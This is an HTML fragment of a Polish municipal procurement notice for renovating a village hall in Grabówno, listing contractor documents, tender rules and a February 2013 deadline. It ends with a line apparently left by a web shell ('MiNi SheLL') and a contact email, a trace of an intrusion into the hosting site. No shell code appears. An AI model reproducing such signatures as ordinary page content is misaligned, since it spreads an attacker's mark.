<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz oferty.
Oświadczenie Wykonawcy - osoby fizycznej, że reprezentowana przez niego firma nie jest w stanie upadłości, ani nie otwarto jej likwidacji.
Informacja o ewentualnym zatrudnieniu podwykonawców robót - na formularzu zgodnym z treścią załącznika Nr 5 do SIWZ
zaakceptowany projekt umowy - załacznik nr 6 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://miasteczko.kraj.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Miasteczko Krajeńskie (pokójnr 9) ul. Dąbrowskiego 16 89 - 350 Miasteczko Krajeńskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2013 godzina 10:00, miejsce: Urząd Gminy Miasteczko Krajeńskie Biuro Obsługi Klienta (sekretariat pokój nr 14) ul. Dąbrowskiego 16 89 -350 Miasteczko Krajeńskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przebudowa i modernizacja świetlicy wiejskiej w Grabównie będzie wykonany przy udziale środków z Programu Rozwoju Obszarów Wiejskich w ramach działania Odnowa i rozwój wsi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com